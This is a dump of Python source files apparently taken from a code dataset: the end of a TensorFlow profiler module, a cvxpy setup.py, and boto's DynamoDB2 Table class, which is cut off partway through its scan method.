opts.account_displayed_op_only = options.get('account_displayed_op_only',
False)
for p in options.get('select', []):
opts.select.append(p)
opts.output = options.get('output', 'stdout')
opts.dump_to_file = options.get('dump_to_file', '')
return opts
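# Illustrative only (not used elsewhere in this module): the dicts produced by
# option_builder.ProfileOptionBuilder are the kind of input _build_options
# expects; treat this pairing as a sketch rather than required usage.
def _example_build_options():
  opts_dict = option_builder.ProfileOptionBuilder.time_and_memory()
  return _build_options(opts_dict)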
def _build_advisor_options(options):
"""Build tfprof.AdvisorOptionsProto.
Args:
options: A dictionary of options. See ALL_ADVICE example.
Returns:
tfprof.AdvisorOptionsProto.
"""
opts = tfprof_options_pb2.AdvisorOptionsProto()
if options is None:
return opts
for checker, checker_opts in six.iteritems(options):
checker_ops_pb = tfprof_options_pb2.AdvisorOptionsProto.CheckerOption()
for k, v in six.iteritems(checker_opts):
checker_ops_pb[k] = v
opts.checkers[checker].MergeFrom(checker_ops_pb)
return opts
@tf_export('profiler.Profiler')
class Profiler(object):
"""TensorFlow multi-step profiler.
https://github.com/tensorflow/tensorflow/tree/master/tensorflow/core/profiler/README.md
```python
Typical use case:
# Currently we are only allowed to create 1 profiler per process.
profiler = Profiler(sess.graph)
for i in xrange(total_steps):
if i % 10000 == 0:
run_meta = tf.RunMetadata()
_ = sess.run(...,
options=tf.RunOptions(
trace_level=tf.RunOptions.FULL_TRACE),
run_metadata=run_meta)
profiler.add_step(i, run_meta)
# Profile the parameters of your model.
profiler.profile_name_scope(options=(option_builder.ProfileOptionBuilder
.trainable_variables_parameter()))
# Or profile the timing of your model operations.
opts = option_builder.ProfileOptionBuilder.time_and_memory()
profiler.profile_operations(options=opts)
# Or you can generate a timeline:
opts = (option_builder.ProfileOptionBuilder(
option_builder.ProfileOptionBuilder.time_and_memory())
.with_step(i)
.with_timeline_output(filename).build())
profiler.profile_graph(options=opts)
else:
_ = sess.run(...)
# Auto detect problems and generate advice.
profiler.advise()
```
"""
def __init__(self, graph=None, op_log=None):
"""Constructor.
Args:
graph: tf.Graph. If None and eager execution is not enabled, use
default graph.
op_log: optional. tensorflow::tfprof::OpLogProto proto. Used to define
extra op types.
"""
if not graph and context.in_graph_mode():
graph = ops.get_default_graph()
self._coverage = 0.0
self._graph = graph
# pylint: disable=protected-access
op_log = tfprof_logger.merge_default_with_oplog(
self._graph, op_log=op_log)
# pylint: enable=protected-access
print_mdl.NewProfiler(
_graph_string(self._graph), op_log.SerializeToString())
def __del__(self):
print_mdl.DeleteProfiler()
def add_step(self, step, run_meta):
"""Add statistics of a step.
Args:
step: int, An id used to group one or more different `run_meta` together.
When profiling with the profile_xxx APIs, user can use the `step`
id in the `options` to profile these `run_meta` together.
run_meta: RunMetadata proto that contains statistics of a session run.
"""
# pylint: disable=protected-access
op_log = tfprof_logger.merge_default_with_oplog(
self._graph, run_meta=run_meta)
# pylint: enable=protected-access
# TODO(xpan): P1: Better to find the current graph.
self._coverage = print_mdl.AddStep(step, _graph_string(self._graph),
run_meta.SerializeToString(),
op_log.SerializeToString())
def profile_python(self, options):
"""Profile the statistics of the Python codes.
By default, it shows the call stack from root. To avoid
redundant output, you may use options to filter as below
options['show_name_regexes'] = ['.*my_code.py.*']
Args:
options: A dict of options. See core/profiler/g3doc/options.md.
Returns:
a MultiGraphNodeProto that records the results.
"""
opts = _build_options(options)
tfprof_node = tfprof_output_pb2.MultiGraphNodeProto()
try:
tfprof_node.ParseFromString(
print_mdl.Profile('code'.encode('utf-8'), opts.SerializeToString()))
except message.DecodeError as e:
sys.stderr.write('Cannot parse returned proto: %s.\n' % e)
return tfprof_node
def profile_operations(self, options):
"""Profile the statistics of the Operation types (e.g. MatMul, Conv2D).
Args:
options: A dict of options. See core/profiler/g3doc/options.md.
Returns:
a MultiGraphNodeProto that records the results.
"""
opts = _build_options(options)
tfprof_node = tfprof_output_pb2.MultiGraphNodeProto()
try:
tfprof_node.ParseFromString(
print_mdl.Profile('op'.encode('utf-8'), opts.SerializeToString()))
except message.DecodeError as e:
sys.stderr.write('Cannot parse returned proto: %s.\n' % e)
return tfprof_node
def profile_name_scope(self, options):
"""Profile the statistics of graph nodes, organized by name scope.
Args:
options: A dict of options. See core/profiler/g3doc/options.md.
Returns:
a GraphNodeProto that records the results.
"""
opts = _build_options(options)
tfprof_node = tfprof_output_pb2.GraphNodeProto()
try:
tfprof_node.ParseFromString(
print_mdl.Profile('scope'.encode('utf-8'), opts.SerializeToString()))
except message.DecodeError as e:
sys.stderr.write('Cannot parse returned proto: %s.\n' % e)
return tfprof_node
def profile_graph(self, options):
"""Profile the statistics of graph nodes, organized by dataflow graph.
Args:
options: A dict of options. See core/profiler/g3doc/options.md.
Returns:
a GraphNodeProto that records the results.
"""
opts = _build_options(options)
tfprof_node = tfprof_output_pb2.GraphNodeProto()
try:
tfprof_node.ParseFromString(
print_mdl.Profile('graph'.encode('utf-8'), opts.SerializeToString()))
except message.DecodeError as e:
sys.stderr.write('Cannot parse returned proto: %s.\n' % e)
return tfprof_node
def advise(self, options):
"""Automatically detect problems and generate reports.
Args:
options: A dict of options. See ALL_ADVICE example above.
Returns:
      An Advice proto that contains the reports from all checkers.
"""
advise_pb = tfprof_output_pb2.AdviceProto()
opts = _build_advisor_options(options)
advise_pb.ParseFromString(
print_mdl.Profile('advise'.encode('utf-8'), opts.SerializeToString()))
return advise_pb
def serialize_to_string(self):
"""Serialize the ProfileProto to a binary string.
Users can write it to file for offline analysis by tfprof commandline
or graphical interface.
Returns:
ProfileProto binary string.
"""
return print_mdl.SerializeToString()
def _write_profile(self, filename):
"""Writes the profile to a file."""
print_mdl.WriteProfile(filename)
@tf_export('profiler.profile')
def profile(graph=None,
run_meta=None,
op_log=None,
cmd='scope',
options=_DEFAULT_PROFILE_OPTIONS):
"""Profile model.
Tutorials and examples can be found in:
https://github.com/tensorflow/tensorflow/tree/master/tensorflow/core/profiler/README.md
Args:
graph: tf.Graph. If None and eager execution is not enabled, use
default graph.
run_meta: optional tensorflow.RunMetadata proto. It is necessary to
        support run time information profiling, such as time and memory.
op_log: tensorflow.tfprof.OpLogProto proto. User can assign "types" to
graph nodes with op_log. "types" allow user to flexibly group and
account profiles using options['accounted_type_regexes'].
cmd: string. Either 'op', 'scope', 'graph' or 'code'.
'op' view organizes profile using operation type. (e.g. MatMul)
'scope' view organizes profile using graph node name scope.
'graph' view organizes profile using graph node inputs/outputs.
'code' view organizes profile using Python call stack.
options: A dict of options. See core/profiler/g3doc/options.md.
Returns:
If cmd is 'scope' or 'graph', returns GraphNodeProto proto.
If cmd is 'op' or 'code', returns MultiGraphNodeProto proto.
Side effect: stdout/file/timeline.json depending on options['output']
"""
if not graph and context.in_graph_mode():
graph = ops.get_default_graph()
if options == _DEFAULT_PROFILE_OPTIONS:
options = (option_builder.ProfileOptionBuilder
.trainable_variables_parameter())
# pylint: disable=protected-access
op_log = tfprof_logger.merge_default_with_oplog(
graph, op_log, run_meta, add_trace=cmd == 'code')
# pylint: enable=protected-access
opts = _build_options(options)
run_meta_str = run_meta.SerializeToString() if run_meta else b''
graph_str = _graph_string(graph)
if cmd == 'code' or cmd == 'op':
tfprof_node = tfprof_output_pb2.MultiGraphNodeProto()
ret = print_mdl.PrintModelAnalysis(graph_str, run_meta_str,
op_log.SerializeToString(),
cmd.encode('utf-8'),
opts.SerializeToString())
try:
tfprof_node.ParseFromString(ret)
except message.DecodeError as e:
sys.stderr.write('Cannot parse returned proto: %s.\n' % e)
elif cmd == 'graph' or cmd == 'scope':
tfprof_node = tfprof_output_pb2.GraphNodeProto()
ret = print_mdl.PrintModelAnalysis(graph_str, run_meta_str,
op_log.SerializeToString(),
cmd.encode('utf-8'),
opts.SerializeToString())
try:
tfprof_node.ParseFromString(ret)
except message.DecodeError as e:
sys.stderr.write('Cannot parse returned proto: %s.\n' % e)
else:
raise errors.InvalidArgumentError(
None, None, 'unknown cmd: %s\n' % cmd)
return tfprof_node
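# A minimal usage sketch (not part of the original module; `sess` and
# `run_meta` are assumed to already exist and are illustrative only):
#
#   opts = option_builder.ProfileOptionBuilder.time_and_memory()
#   profile(sess.graph, run_meta=run_meta, cmd='op', options=opts)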
@tf_export('profiler.advise')
def advise(graph=None, run_meta=None, options=_DEFAULT_ADVISE_OPTIONS):
"""Auto profile and advise.
Builds profiles and automatically check anomalies of various
aspects. For more details:
https://github.com/tensorflow/tensorflow/tree/master/tensorflow/core/profiler/README.md
Args:
graph: tf.Graph. If None and eager execution is not enabled, use
default graph.
run_meta: optional tensorflow.RunMetadata proto. It is necessary to
      support run time information profiling, such as time and memory.
options: see ALL_ADVICE example above. Default checks everything.
Returns:
Returns AdviceProto proto
"""
  if not graph and context.in_graph_mode():
graph = ops.get_default_graph()
if options == _DEFAULT_ADVISE_OPTIONS:
options = ALL_ADVICE.copy()
# pylint: disable=protected-access
op_log = tfprof_logger.merge_default_with_oplog(
graph, None, run_meta, add_trace=True)
# pylint: enable=protected-access
run_meta_str = run_meta.SerializeToString() if run_meta else b''
opts = _build_advisor_options(options)
ret = tfprof_output_pb2.AdviceProto()
ret.ParseFromString(
print_mdl.PrintModelAnalysis(
_graph_string(graph), run_meta_str, op_log.SerializeToString(),
'advise'.encode('utf-8'), opts.SerializeToString()))
return ret
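# Illustrative sketch only (assumes `sess` and `run_meta` from a traced run;
# ALL_ADVICE is defined earlier in this module):
#
#   report = advise(sess.graph, run_meta=run_meta, options=ALL_ADVICE)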
| apache-2.0 | 239,228,117,130,773,600 | 34.714286 | 91 | 0.665733 | false |
jpmpentwater/cvxpy | setup.py | 1 | 1350 | from setuptools import setup
setup(
name='cvxpy',
version='0.2.28',
author='Steven Diamond, Eric Chu, Stephen Boyd',
author_email='[email protected], [email protected], [email protected]',
packages=['cvxpy',
'cvxpy.atoms',
'cvxpy.atoms.affine',
'cvxpy.atoms.elementwise',
'cvxpy.constraints',
'cvxpy.expressions',
'cvxpy.expressions.constants',
'cvxpy.expressions.variables',
'cvxpy.interface',
'cvxpy.interface.numpy_interface',
'cvxpy.interface.cvxopt_interface',
'cvxpy.lin_ops',
'cvxpy.problems',
'cvxpy.problems.problem_data',
'cvxpy.problems.solvers',
'cvxpy.tests',
'cvxpy.transforms',
'cvxpy.utilities'],
package_dir={'cvxpy': 'cvxpy'},
url='http://github.com/cvxgrp/cvxpy/',
license='GPLv3',
zip_safe=False,
description='A domain-specific language for modeling convex optimization problems in Python.',
install_requires=["cvxopt >= 1.1.6",
"ecos >= 2.0.4",
"scs >= 1.1.3",
"toolz",
"numpy >= 1.8",
"scipy >= 0.13"],
use_2to3=True,
)
| gpl-3.0 | 845,811,221,487,602,400 | 34.526316 | 98 | 0.50963 | false |
lochiiconnectivity/boto | boto/dynamodb2/table.py | 2 | 38302 | from boto.dynamodb2 import exceptions
from boto.dynamodb2.fields import (HashKey, RangeKey,
AllIndex, KeysOnlyIndex, IncludeIndex)
from boto.dynamodb2.items import Item
from boto.dynamodb2.layer1 import DynamoDBConnection
from boto.dynamodb2.results import ResultSet, BatchGetResultSet
from boto.dynamodb2.types import Dynamizer, FILTER_OPERATORS, QUERY_OPERATORS
class Table(object):
"""
Interacts & models the behavior of a DynamoDB table.
The ``Table`` object represents a set (or rough categorization) of
records within DynamoDB. The important part is that all records within the
table, while largely-schema-free, share the same schema & are essentially
namespaced for use in your application. For example, you might have a
``users`` table or a ``forums`` table.
"""
max_batch_get = 100
def __init__(self, table_name, schema=None, throughput=None, indexes=None,
connection=None):
"""
Sets up a new in-memory ``Table``.
This is useful if the table already exists within DynamoDB & you simply
want to use it for additional interactions. The only required parameter
is the ``table_name``. However, under the hood, the object will call
``describe_table`` to determine the schema/indexes/throughput. You
can avoid this extra call by passing in ``schema`` & ``indexes``.
**IMPORTANT** - If you're creating a new ``Table`` for the first time,
you should use the ``Table.create`` method instead, as it will
persist the table structure to DynamoDB.
Requires a ``table_name`` parameter, which should be a simple string
of the name of the table.
Optionally accepts a ``schema`` parameter, which should be a list of
``BaseSchemaField`` subclasses representing the desired schema.
Optionally accepts a ``throughput`` parameter, which should be a
dictionary. If provided, it should specify a ``read`` & ``write`` key,
both of which should have an integer value associated with them.
Optionally accepts a ``indexes`` parameter, which should be a list of
``BaseIndexField`` subclasses representing the desired indexes.
Optionally accepts a ``connection`` parameter, which should be a
``DynamoDBConnection`` instance (or subclass). This is primarily useful
for specifying alternate connection parameters.
Example::
# The simple, it-already-exists case.
>>> conn = Table('users')
# The full, minimum-extra-calls case.
>>> from boto.dynamodb2.layer1 import DynamoDBConnection
>>> users = Table('users', schema=[
... HashKey('username'),
... RangeKey('date_joined', data_type=NUMBER)
... ], throughput={
... 'read':20,
... 'write': 10,
... }, indexes=[
... KeysOnlyIndex('MostRecentlyJoined', parts=[
... RangeKey('date_joined')
... ]),
... ],
... connection=DynamoDBConnection(
... aws_access_key_id='key',
... aws_secret_access_key='key',
... region='us-west-2'
... ))
"""
self.table_name = table_name
self.connection = connection
self.throughput = {
'read': 5,
'write': 5,
}
self.schema = schema
self.indexes = indexes
if self.connection is None:
self.connection = DynamoDBConnection()
if throughput is not None:
self.throughput = throughput
self._dynamizer = Dynamizer()
@classmethod
def create(cls, table_name, schema, throughput=None, indexes=None,
connection=None):
"""
Creates a new table in DynamoDB & returns an in-memory ``Table`` object.
This will setup a brand new table within DynamoDB. The ``table_name``
must be unique for your AWS account. The ``schema`` is also required
to define the key structure of the table.
**IMPORTANT** - You should consider the usage pattern of your table
up-front, as the schema & indexes can **NOT** be modified once the
table is created, requiring the creation of a new table & migrating
the data should you wish to revise it.
**IMPORTANT** - If the table already exists in DynamoDB, additional
calls to this method will result in an error. If you just need
a ``Table`` object to interact with the existing table, you should
just initialize a new ``Table`` object, which requires only the
``table_name``.
Requires a ``table_name`` parameter, which should be a simple string
of the name of the table.
Requires a ``schema`` parameter, which should be a list of
``BaseSchemaField`` subclasses representing the desired schema.
Optionally accepts a ``throughput`` parameter, which should be a
dictionary. If provided, it should specify a ``read`` & ``write`` key,
both of which should have an integer value associated with them.
Optionally accepts a ``indexes`` parameter, which should be a list of
``BaseIndexField`` subclasses representing the desired indexes.
Optionally accepts a ``connection`` parameter, which should be a
``DynamoDBConnection`` instance (or subclass). This is primarily useful
for specifying alternate connection parameters.
Example::
            >>> users = Table.create('users', schema=[
... HashKey('username'),
... RangeKey('date_joined', data_type=NUMBER)
... ], throughput={
... 'read':20,
... 'write': 10,
... }, indexes=[
... KeysOnlyIndex('MostRecentlyJoined', parts=[
... RangeKey('date_joined')
... ]),
... ])
"""
table = cls(table_name=table_name, connection=connection)
table.schema = schema
if throughput is not None:
table.throughput = throughput
if indexes is not None:
table.indexes = indexes
# Prep the schema.
raw_schema = []
attr_defs = []
for field in table.schema:
raw_schema.append(field.schema())
# Build the attributes off what we know.
attr_defs.append(field.definition())
raw_throughput = {
'ReadCapacityUnits': int(table.throughput['read']),
'WriteCapacityUnits': int(table.throughput['write']),
}
kwargs = {}
if table.indexes:
# Prep the LSIs.
raw_lsi = []
for index_field in table.indexes:
raw_lsi.append(index_field.schema())
# Again, build the attributes off what we know.
# HOWEVER, only add attributes *NOT* already seen.
attr_define = index_field.definition()
for part in attr_define:
attr_names = [attr['AttributeName'] for attr in attr_defs]
if not part['AttributeName'] in attr_names:
attr_defs.append(part)
kwargs['local_secondary_indexes'] = raw_lsi
table.connection.create_table(
table_name=table.table_name,
attribute_definitions=attr_defs,
key_schema=raw_schema,
provisioned_throughput=raw_throughput,
**kwargs
)
return table
def _introspect_schema(self, raw_schema):
"""
Given a raw schema structure back from a DynamoDB response, parse
out & build the high-level Python objects that represent them.
"""
schema = []
for field in raw_schema:
if field['KeyType'] == 'HASH':
schema.append(HashKey(field['AttributeName']))
elif field['KeyType'] == 'RANGE':
schema.append(RangeKey(field['AttributeName']))
else:
raise exceptions.UnknownSchemaFieldError(
"%s was seen, but is unknown. Please report this at "
"https://github.com/boto/boto/issues." % field['KeyType']
)
return schema
def _introspect_indexes(self, raw_indexes):
"""
Given a raw index structure back from a DynamoDB response, parse
out & build the high-level Python objects that represent them.
"""
indexes = []
for field in raw_indexes:
index_klass = AllIndex
kwargs = {
'parts': []
}
if field['Projection']['ProjectionType'] == 'ALL':
index_klass = AllIndex
elif field['Projection']['ProjectionType'] == 'KEYS_ONLY':
index_klass = KeysOnlyIndex
elif field['Projection']['ProjectionType'] == 'INCLUDE':
index_klass = IncludeIndex
kwargs['includes'] = field['Projection']['NonKeyAttributes']
else:
raise exceptions.UnknownIndexFieldError(
"%s was seen, but is unknown. Please report this at "
"https://github.com/boto/boto/issues." % \
field['Projection']['ProjectionType']
)
name = field['IndexName']
kwargs['parts'] = self._introspect_schema(field['KeySchema'])
indexes.append(index_klass(name, **kwargs))
return indexes
def describe(self):
"""
Describes the current structure of the table in DynamoDB.
This information will be used to update the ``schema``, ``indexes``
and ``throughput`` information on the ``Table``. Some calls, such as
those involving creating keys or querying, will require this
information to be populated.
It also returns the full raw datastructure from DynamoDB, in the
event you'd like to parse out additional information (such as the
``ItemCount`` or usage information).
Example::
>>> users.describe()
{
# Lots of keys here...
}
>>> len(users.schema)
2
"""
result = self.connection.describe_table(self.table_name)
# Blindly update throughput, since what's on DynamoDB's end is likely
# more correct.
raw_throughput = result['Table']['ProvisionedThroughput']
self.throughput['read'] = int(raw_throughput['ReadCapacityUnits'])
self.throughput['write'] = int(raw_throughput['WriteCapacityUnits'])
if not self.schema:
# Since we have the data, build the schema.
raw_schema = result['Table'].get('KeySchema', [])
self.schema = self._introspect_schema(raw_schema)
if not self.indexes:
# Build the index information as well.
raw_indexes = result['Table'].get('LocalSecondaryIndexes', [])
self.indexes = self._introspect_indexes(raw_indexes)
# This is leaky.
return result
def update(self, throughput):
"""
Updates table attributes in DynamoDB.
Currently, the only thing you can modify about a table after it has
been created is the throughput.
Requires a ``throughput`` parameter, which should be a
dictionary. If provided, it should specify a ``read`` & ``write`` key,
both of which should have an integer value associated with them.
Returns ``True`` on success.
Example::
# For a read-heavier application...
>>> users.update(throughput={
... 'read': 20,
... 'write': 10,
... })
True
"""
self.throughput = throughput
self.connection.update_table(self.table_name, {
'ReadCapacityUnits': int(self.throughput['read']),
'WriteCapacityUnits': int(self.throughput['write']),
})
return True
def delete(self):
"""
Deletes a table in DynamoDB.
**IMPORTANT** - Be careful when using this method, there is no undo.
Returns ``True`` on success.
Example::
>>> users.delete()
True
"""
self.connection.delete_table(self.table_name)
return True
def _encode_keys(self, keys):
"""
Given a flat Python dictionary of keys/values, converts it into the
nested dictionary DynamoDB expects.
Converts::
{
'username': 'john',
'tags': [1, 2, 5],
}
...to...::
{
'username': {'S': 'john'},
'tags': {'NS': ['1', '2', '5']},
}
"""
raw_key = {}
for key, value in keys.items():
raw_key[key] = self._dynamizer.encode(value)
return raw_key
def get_item(self, consistent=False, **kwargs):
"""
Fetches an item (record) from a table in DynamoDB.
To specify the key of the item you'd like to get, you can specify the
key attributes as kwargs.
Optionally accepts a ``consistent`` parameter, which should be a
boolean. If you provide ``True``, it will perform
a consistent (but more expensive) read from DynamoDB.
(Default: ``False``)
Returns an ``Item`` instance containing all the data for that record.
Example::
# A simple hash key.
>>> john = users.get_item(username='johndoe')
>>> john['first_name']
'John'
# A complex hash+range key.
>>> john = users.get_item(username='johndoe', last_name='Doe')
>>> john['first_name']
'John'
# A consistent read (assuming the data might have just changed).
>>> john = users.get_item(username='johndoe', consistent=True)
>>> john['first_name']
'Johann'
# With a key that is an invalid variable name in Python.
# Also, assumes a different schema than previous examples.
>>> john = users.get_item(**{
... 'date-joined': 127549192,
... })
>>> john['first_name']
'John'
"""
raw_key = self._encode_keys(kwargs)
item_data = self.connection.get_item(
self.table_name,
raw_key,
consistent_read=consistent
)
item = Item(self)
item.load(item_data)
return item
def put_item(self, data, overwrite=False):
"""
Saves an entire item to DynamoDB.
By default, if any part of the ``Item``'s original data doesn't match
what's currently in DynamoDB, this request will fail. This prevents
other processes from updating the data in between when you read the
item & when your request to update the item's data is processed, which
would typically result in some data loss.
Requires a ``data`` parameter, which should be a dictionary of the data
you'd like to store in DynamoDB.
Optionally accepts an ``overwrite`` parameter, which should be a
boolean. If you provide ``True``, this will tell DynamoDB to blindly
overwrite whatever data is present, if any.
Returns ``True`` on success.
Example::
>>> users.put_item(data={
... 'username': 'jane',
... 'first_name': 'Jane',
... 'last_name': 'Doe',
... 'date_joined': 126478915,
... })
True
"""
item = Item(self, data=data)
return item.save(overwrite=overwrite)
def _put_item(self, item_data, expects=None):
"""
The internal variant of ``put_item`` (full data). This is used by the
``Item`` objects, since that operation is represented at the
table-level by the API, but conceptually maps better to telling an
individual ``Item`` to save itself.
"""
kwargs = {}
if expects is not None:
kwargs['expected'] = expects
self.connection.put_item(self.table_name, item_data, **kwargs)
return True
def _update_item(self, key, item_data, expects=None):
"""
The internal variant of ``put_item`` (partial data). This is used by the
``Item`` objects, since that operation is represented at the
table-level by the API, but conceptually maps better to telling an
individual ``Item`` to save itself.
"""
raw_key = self._encode_keys(key)
kwargs = {}
if expects is not None:
kwargs['expected'] = expects
self.connection.update_item(self.table_name, raw_key, item_data, **kwargs)
return True
def delete_item(self, **kwargs):
"""
Deletes an item in DynamoDB.
**IMPORTANT** - Be careful when using this method, there is no undo.
To specify the key of the item you'd like to get, you can specify the
key attributes as kwargs.
Returns ``True`` on success.
Example::
# A simple hash key.
>>> users.delete_item(username='johndoe')
True
# A complex hash+range key.
>>> users.delete_item(username='jane', last_name='Doe')
True
# With a key that is an invalid variable name in Python.
# Also, assumes a different schema than previous examples.
>>> users.delete_item(**{
... 'date-joined': 127549192,
... })
True
"""
raw_key = self._encode_keys(kwargs)
self.connection.delete_item(self.table_name, raw_key)
return True
def get_key_fields(self):
"""
Returns the fields necessary to make a key for a table.
If the ``Table`` does not already have a populated ``schema``,
this will request it via a ``Table.describe`` call.
Returns a list of fieldnames (strings).
Example::
# A simple hash key.
>>> users.get_key_fields()
['username']
# A complex hash+range key.
>>> users.get_key_fields()
['username', 'last_name']
"""
if not self.schema:
# We don't know the structure of the table. Get a description to
# populate the schema.
self.describe()
return [field.name for field in self.schema]
def batch_write(self):
"""
Allows the batching of writes to DynamoDB.
Since each write/delete call to DynamoDB has a cost associated with it,
when loading lots of data, it makes sense to batch them, creating as
few calls as possible.
This returns a context manager that will transparently handle creating
these batches. The object you get back lightly-resembles a ``Table``
object, sharing just the ``put_item`` & ``delete_item`` methods
(which are all that DynamoDB can batch in terms of writing data).
DynamoDB's maximum batch size is 25 items per request. If you attempt
to put/delete more than that, the context manager will batch as many
as it can up to that number, then flush them to DynamoDB & continue
batching as more calls come in.
Example::
# Assuming a table with one record...
>>> with users.batch_write() as batch:
... batch.put_item(data={
... 'username': 'johndoe',
... 'first_name': 'John',
... 'last_name': 'Doe',
... 'owner': 1,
... })
... # Nothing across the wire yet.
... batch.delete_item(username='bob')
... # Still no requests sent.
... batch.put_item(data={
... 'username': 'jane',
... 'first_name': 'Jane',
... 'last_name': 'Doe',
... 'date_joined': 127436192,
... })
... # Nothing yet, but once we leave the context, the
... # put/deletes will be sent.
"""
# PHENOMENAL COSMIC DOCS!!! itty-bitty code.
return BatchTable(self)
def _build_filters(self, filter_kwargs, using=QUERY_OPERATORS):
"""
An internal method for taking query/scan-style ``**kwargs`` & turning
them into the raw structure DynamoDB expects for filtering.
"""
filters = {}
for field_and_op, value in filter_kwargs.items():
field_bits = field_and_op.split('__')
fieldname = '__'.join(field_bits[:-1])
try:
op = using[field_bits[-1]]
except KeyError:
raise exceptions.UnknownFilterTypeError(
"Operator '%s' from '%s' is not recognized." % (
field_bits[-1],
field_and_op
)
)
lookup = {
'AttributeValueList': [],
'ComparisonOperator': op,
}
# Special-case the ``NULL/NOT_NULL`` case.
if field_bits[-1] == 'null':
del lookup['AttributeValueList']
if value is False:
lookup['ComparisonOperator'] = 'NOT_NULL'
else:
lookup['ComparisonOperator'] = 'NULL'
# Special-case the ``BETWEEN`` case.
elif field_bits[-1] == 'between':
if len(value) == 2 and isinstance(value, (list, tuple)):
lookup['AttributeValueList'].append(
self._dynamizer.encode(value[0])
)
lookup['AttributeValueList'].append(
self._dynamizer.encode(value[1])
)
else:
# Fix up the value for encoding, because it was built to only work
# with ``set``s.
if isinstance(value, (list, tuple)):
value = set(value)
lookup['AttributeValueList'].append(
self._dynamizer.encode(value)
)
# Finally, insert it into the filters.
filters[fieldname] = lookup
return filters
def query(self, limit=None, index=None, reverse=False, consistent=False,
attributes=None, **filter_kwargs):
"""
Queries for a set of matching items in a DynamoDB table.
Queries can be performed against a hash key, a hash+range key or
against any data stored in your local secondary indexes.
**Note** - You can not query against arbitrary fields within the data
stored in DynamoDB.
To specify the filters of the items you'd like to get, you can specify
the filters as kwargs. Each filter kwarg should follow the pattern
``<fieldname>__<filter_operation>=<value_to_look_for>``.
Optionally accepts a ``limit`` parameter, which should be an integer
count of the total number of items to return. (Default: ``None`` -
all results)
        Optionally accepts an ``index`` parameter, which should be a string of
        the name of the local secondary index you want to query against.
(Default: ``None``)
Optionally accepts a ``reverse`` parameter, which will present the
results in reverse order. (Default: ``None`` - normal order)
Optionally accepts a ``consistent`` parameter, which should be a
boolean. If you provide ``True``, it will force a consistent read of
the data (more expensive). (Default: ``False`` - use eventually
consistent reads)
        Optionally accepts an ``attributes`` parameter, which should be a
        tuple. If you provide any attributes, only these will be fetched
        from DynamoDB. This uses the ``AttributesToGet`` API parameter and
        sets ``Select`` to ``SPECIFIC_ATTRIBUTES``.
Returns a ``ResultSet``, which transparently handles the pagination of
results you get back.
Example::
# Look for last names equal to "Doe".
>>> results = users.query(last_name__eq='Doe')
>>> for res in results:
... print res['first_name']
'John'
'Jane'
# Look for last names beginning with "D", in reverse order, limit 3.
>>> results = users.query(
... last_name__beginswith='D',
... reverse=True,
... limit=3
... )
>>> for res in results:
... print res['first_name']
'Alice'
'Jane'
'John'
# Use an LSI & a consistent read.
>>> results = users.query(
... date_joined__gte=1236451000,
... owner__eq=1,
... index='DateJoinedIndex',
... consistent=True
... )
>>> for res in results:
... print res['first_name']
'Alice'
'Bob'
'John'
'Fred'
"""
if self.schema:
if len(self.schema) == 1 and len(filter_kwargs) <= 1:
raise exceptions.QueryError(
"You must specify more than one key to filter on."
)
if attributes is not None:
select = 'SPECIFIC_ATTRIBUTES'
else:
select = None
results = ResultSet()
kwargs = filter_kwargs.copy()
kwargs.update({
'limit': limit,
'index': index,
'reverse': reverse,
'consistent': consistent,
'select': select,
'attributes_to_get': attributes
})
results.to_call(self._query, **kwargs)
return results
def query_count(self, index=None, consistent=False, **filter_kwargs):
"""
Queries the exact count of matching items in a DynamoDB table.
Queries can be performed against a hash key, a hash+range key or
against any data stored in your local secondary indexes.
To specify the filters of the items you'd like to get, you can specify
the filters as kwargs. Each filter kwarg should follow the pattern
``<fieldname>__<filter_operation>=<value_to_look_for>``.
        Optionally accepts an ``index`` parameter, which should be a string of
        the name of the local secondary index you want to query against.
(Default: ``None``)
Optionally accepts a ``consistent`` parameter, which should be a
boolean. If you provide ``True``, it will force a consistent read of
the data (more expensive). (Default: ``False`` - use eventually
consistent reads)
Returns an integer which represents the exact amount of matched
items.
Example::
# Look for last names equal to "Doe".
>>> users.query_count(last_name__eq='Doe')
5
# Use an LSI & a consistent read.
>>> users.query_count(
... date_joined__gte=1236451000,
... owner__eq=1,
... index='DateJoinedIndex',
... consistent=True
... )
2
"""
key_conditions = self._build_filters(
filter_kwargs,
using=QUERY_OPERATORS
)
raw_results = self.connection.query(
self.table_name,
index_name=index,
consistent_read=consistent,
select='COUNT',
key_conditions=key_conditions,
)
return int(raw_results.get('Count', 0))
def _query(self, limit=None, index=None, reverse=False, consistent=False,
exclusive_start_key=None, select=None, attributes_to_get=None,
**filter_kwargs):
"""
The internal method that performs the actual queries. Used extensively
by ``ResultSet`` to perform each (paginated) request.
"""
kwargs = {
'limit': limit,
'index_name': index,
'scan_index_forward': reverse,
'consistent_read': consistent,
'select': select,
'attributes_to_get': attributes_to_get
}
if exclusive_start_key:
kwargs['exclusive_start_key'] = {}
for key, value in exclusive_start_key.items():
kwargs['exclusive_start_key'][key] = \
self._dynamizer.encode(value)
# Convert the filters into something we can actually use.
kwargs['key_conditions'] = self._build_filters(
filter_kwargs,
using=QUERY_OPERATORS
)
raw_results = self.connection.query(
self.table_name,
**kwargs
)
results = []
last_key = None
for raw_item in raw_results.get('Items', []):
item = Item(self)
item.load({
'Item': raw_item,
})
results.append(item)
if raw_results.get('LastEvaluatedKey', None):
last_key = {}
for key, value in raw_results['LastEvaluatedKey'].items():
last_key[key] = self._dynamizer.decode(value)
return {
'results': results,
'last_key': last_key,
}
def scan(self, limit=None, segment=None, total_segments=None,
**filter_kwargs):
"""
Scans across all items within a DynamoDB table.
Scans can be performed against a hash key or a hash+range key. You can
additionally filter the results after the table has been read but
before the response is returned.
To specify the filters of the items you'd like to get, you can specify
the filters as kwargs. Each filter kwarg should follow the pattern
``<fieldname>__<filter_operation>=<value_to_look_for>``.
Optionally accepts a ``limit`` parameter, which should be an integer
count of the total number of items to return. (Default: ``None`` -
all results)
Returns a ``ResultSet``, which transparently handles the pagination of
results you get back.
Example::
# All results.
>>> everything = users.scan()
# Look for last names beginning with "D".
>>> results = users.scan(last_name__beginswith='D')
>>> for res in results:
... print res['first_name']
'Alice'
'John'
'Jane'
# Use an ``IN`` filter & limit.
>>> results = users.scan(
... age__in=[25, 26, 27, 28, 29],
... limit=1
... )
>>> for res in results:
... print res['first_name']
'Alice'
"""
results = ResultSet()
kwargs = filter_kwargs.copy()
kwargs.update({
'limit': limit,
'segment': segment,
'total_segments': total_segments,
})
results.to_call(self._scan, **kwargs)
return results
def _scan(self, limit=None, exclusive_start_key=None, segment=None,
total_segments=None, **filter_kwargs):
"""
